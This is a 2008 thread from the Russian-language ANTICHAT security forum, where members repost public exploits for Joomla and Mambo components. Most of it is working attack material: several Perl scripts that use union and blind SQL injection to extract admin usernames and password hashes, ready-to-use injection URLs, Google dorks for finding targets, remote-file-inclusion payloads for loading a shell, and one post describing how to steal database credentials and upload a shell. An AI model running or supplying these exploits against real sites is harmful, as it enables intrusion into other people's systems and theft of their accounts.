ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
09.06.2008, 21:40
|
|
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631
Репутация:
380
|
|
Joomla Component News Portal <= 1.0 Blind SQL Injection Exploit
Код:
#!/usr/bin/perl
#[[Script Name: Joomla Component News Portal <= 1.0 Blind SQL Injection Exploit
#[[Coded by : MEFISTO
#[[Author : ilker Kandemir
#[[Dork : "index.php?option=com_news_portal" or "Powered by iJoomla News Portal"
use IO::Socket;
if(@ARGV < 1){
print "
[[========================================================================
[[// Joomla Component News Portal <= 1.0 Blind SQL Injection Exploit
[[// Usage: cnp.pl [target]
[[// Example: cnp.pl victim.com
[[// Vuln&Exp : iLker Kandemir a.k.a MEFISTO
[[// website : www.dumenci.net -
[[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/index.php?option=com_news_portal&Itemid=";
print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);
if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}
if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
}
$target = "-1%20union%20select%20111,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,119,111,114,100,58),password),333%20from%20jos_users/*";
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /username:(.*?)pass/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
if ($answer =~ /password:(.*?)border/){
print "+ Password: $1\n";
}
if ($answer =~ /Syntax error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
# milw0rm.com [2008-06-09]
milw0rm.com [2008-06-09]
Последний раз редактировалось maxster; 09.06.2008 в 22:25..
|
|
|
13.06.2008, 21:45
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
Mambo Component galleries v 1.0 Remote SQL Injection
Код HTML:
#!/usr/bin/perl -w
# Mambo Component galleries v 1.0 Remote SQL Injection #
########################################
#[*] Found by : Houssamix From H-T Team
#[*] H-T Team [ HouSSaMix + ToXiC350 ]
#[*] Greetz : bugtr4cker & Stack & HaCkeR_EgY & Hak3r-b0y & All friends & All muslims HaCkeRs :)
#[*] Script_Name: "Mambo"
#[*] Component_Name: galleries v 1.0
########################################
# <mosinstall type="component">
# <name>galleries</name>
#<creationDate>10/04/2006</creationDate>
#<author>Vinay Kr. Singh</author>
#<copyright>This component is released under the GNU License</copyright>
#<authorEmail>vinay.singh@yahoo.com</authorEmail>
#<authorUrl>www.opensource.com</authorUrl>
#<version>1.0</version>
system("color f");
print "\t\t########################################################\n\n";
print "\t\t# Viva Islam #\n\n";
print "\t\t########################################################\n\n";
print "\t\t# Mambo Component galleries 1.0 Remote SQL Injection #\n\n";
print "\t\t# H-T Team [HouSSaMiX - ToXiC350] #\n\n";
print "\t\t########################################################\n\n";
use LWP::UserAgent;
print "\nEnter your Target (http://site.com/mambo/): ";
chomp(my $target=<STDIN>);
$uname="username";
$passwd="password";
$magic="mos_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/index.php?option=com_galleries&id=10&aid=-1%20union%20select%201,2,3,concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62))from/**/".$magic."/**";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
print "\n[+] The Target : ".$target."";
if ($answer =~ /<user>(.*?)<user>/){
print "\n[+] Admin User : $1";
}
$host2 = $target . "index.php?option=com_galleries&id=10&aid=-1%20union%20select%201,2,3,".$passwd."/**/from/**/".$magic."/**";
$res2 = $b->request(HTTP::Request->new(GET=>$host2));
$answer = $res2->content;
if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Exploit succeed! #\n\n";
}
else{print "\n[-] Exploit Failed...\n";
}
# codec by Houssamix From H-T Team
# milw0rm.com [2008-06-13]
milw0rm.com [2008-06-13]
Последний раз редактировалось .Begemot.; 13.06.2008 в 22:04..
|
|
|
|
14.06.2008, 12:42
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
Mambo <= 4.6.4 Remote File Inclusion Vulnerability
Код HTML:
.-----------------------------------------------------------------------------.
| vuln.: Mambo <= 4.6.4 Remote File Inclusion Vulnerability |
| download: http://mambo-foundation.org/ |
| |
| author: irk4z@yahoo.pl |
| homepage: http://irk4z.wordpress.com/ |
| |
| greets to: all friends ;) |
'-----------------------------------------------------------------------------'
# code:
/includes/Cache/Lite/Output.php :
1 <?php
2
3 /**
4 * This class extends Cache_Lite and uses output buffering to get the data to cache.
5 *
6 * There are some examples in the 'docs/examples' file
7 * Technical choices are described in the 'docs/technical' file
8 *
9 * @package Cache_Lite
10 * @version $Id: Output.php,v 1.1 2005/07/22 01:57:13 eddieajau Exp $
11 * @author Fabien MARTY <fab@php.net>
12 */
13
14 require_once($mosConfig_absolute_path . '/includes/Cache/Lite.php');
...
^ no comment.. RFI in line 14..
# exploit:
http://[host]/[path]/includes/Cache/Lite/Output.php?mosConfig_absolute_path=http://shell?
# milw0rm.com [2008-06-13]
milw0rm.com [2008-06-13]
|
|
|
|
18.06.2008, 11:12
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
Joomla components AstatsPro:
/administrator/components/com_astatspro/refer.php?id=-1+and+typ+=+1+union+select+1,2,concat(username,pas sword,0x2e,usertype)+from+jos_users+limit+2,1--
Залезть в пхпмайадмин можно узнав пароль с помощью JoomlaXplorer (если таковой установлен), после добычи пароля заходим в компонент JoomlaXplorer, далее ищем configuration.php и читаем логин и пасс от БД.
Залить шелл также можно с помощью етого компонента.
|
|
|
|
Joomla Component expshop Remote SQL injection |
22.06.2008, 12:46
|
|
Постоянный
Регистрация: 12.04.2007
Сообщений: 413
Провел на форуме:
3578578
Репутация:
275
|
|
Joomla Component expshop Remote SQL injection
Joomla Component expshop Remote SQL injection
Уязвимость:
http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&cat id={SQL}
Пример:
http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&cat id=-2 UNION SELECT @@version,@@version,concat(username,0x3a,password) FROM jos_users--
# milw0rm.com [2008-06-22] http://www.milw0rm.com/exploits/5893
|
|
|
|
25.06.2008, 12:57
|
|
Познающий
Регистрация: 19.10.2007
Сообщений: 31
Провел на форуме:
103648
Репутация:
4
|
|
Joomla Component com_facileforms 1.4.4
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «ff_compath» сценарием facileforms.frame.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Эксплоит:
www.site.com/path/components/com_facileforms/facileforms.frame.php?ff_compath=[SH3LL]
/path/components/com_facileforms/facileforms.frame.php?ff_compath=[SH3LL]
|
|
|
|
25.06.2008, 14:10
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
Mambo Component Articles Blind SQL Injection 0-day Exploit by Ded MustD!e
PHP код:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #######################################################################\n";
print " # Mambo Component Articles Blind SQL Injection Exploit #\n";
print " # Author:Ded MustD!e [www.antichat.ru] #\n";
print " # #\n";
print " # Dork : inurl:option=articles artid #\n";
print " # Usage: perl exploit.pl host path <options> #\n";
print " # Example: perl exploit.pl www.host.com /joomla/ -a 2 #\n";
print " # #\n";
print " # Options: #\n";
print " # -a valid Article id #\n";
print " #######################################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $aid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "a=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
if($options{"a"})
{
$aid = $options{"a"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $aid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=articles&task=viewarticle&artid=".$aid." and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1),".$i.",1))=".$h."";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "Back";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
|
|
|
|
26.06.2008, 08:40
|
|
Участник форума
Регистрация: 16.06.2006
Сообщений: 179
Провел на форуме:
515368
Репутация:
135
|
|
Joomla Component netinvoice Remote SQL injection
POC :
Код:
http://localhost/[Joomla_Path]/index.php?option=com_netinvoice&action=orders&task=order&cid={SQL}
Example:
Код:
http://localhost/[Joomla_Path]/index.php?option=com_netinvoice&action=orders&task=order&cid=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 FROM jos_users--
(c)milw0rm.com
|
|
|
|
Joomla Component beamospetition Remote SQL injection |
29.06.2008, 20:09
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
Joomla Component beamospetition Remote SQL injection
[*] Author : His0k4 [ALGERIAN HaCkEr]
[*] Dork : inurl:com_beamospetition
[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet={SQL}
[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet=-5 UNION SELECT user(),user(),user(),user(),user(),user(),user(),c oncat(username,0x3a,password),user(),user(),user() ,user(),user(),user(),user() FROM jos_users--
------------------------------------------------------------------------
# milw0rm.com [2008-06-28]
|
|
|
|
Mambo Component n-gallery SQL Injection |
01.07.2008, 16:12
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
Mambo Component n-gallery SQL Injection
Mambo Component n-gallery SQL Injection
DORK : allinurl:"com_n-gallery"
index.php?option=com_n-gallery&Itemid=29&sP=-1+union+select+1,2,concat(username,char(58),passwo rd)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mo s_users/*
milw0rm.com [2008-06-30]
и еще
Joomla Component Xe webtv Blind SQL Injection Exploit
Код:
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " ################################################################\n";
print " # Joomla Component Xe webtv Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Conctact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.dz-secure.com #\n";
print " # http://www.palcastle.org/cc #\n";
print " # #\n";
print " # Dork: inurl:com_xewebtv #\n";
print " # Usage: perl xewebtv.pl host path <options> #\n";
print " # Example: perl xewebtv.pl www.host.com /joomla/ -t 11 -c 2 #\n";
print " # #\n";
print " # Options: #\n";
print " # -t Valid tv id #\n";
print " # -c Category value of the following id #\n";
print " # Note: #\n";
print " # You can change the match string if you need that #\n";
print " ################################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $cid = $ARGV[2];
my $tid = $ARGV[3];
my %options = ();
GetOptions(\%options, "c=i", "p=s", "t=i");
print "[~] Exploiting...\n";
if($options{"c"})
{
$cid = $options{"c"};
}
if($options{"t"})
{
$tid = $options{"t"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $cid, $tid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $cid, $tid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $cid = shift;
my $tid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_xewebtv&Itemid=60&func=detail&id=".$tid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "viewcategory&catid=".$cid."";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
# milw0rm.com [2008-06-28]
Последний раз редактировалось Rubaka; 04.07.2008 в 01:03..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
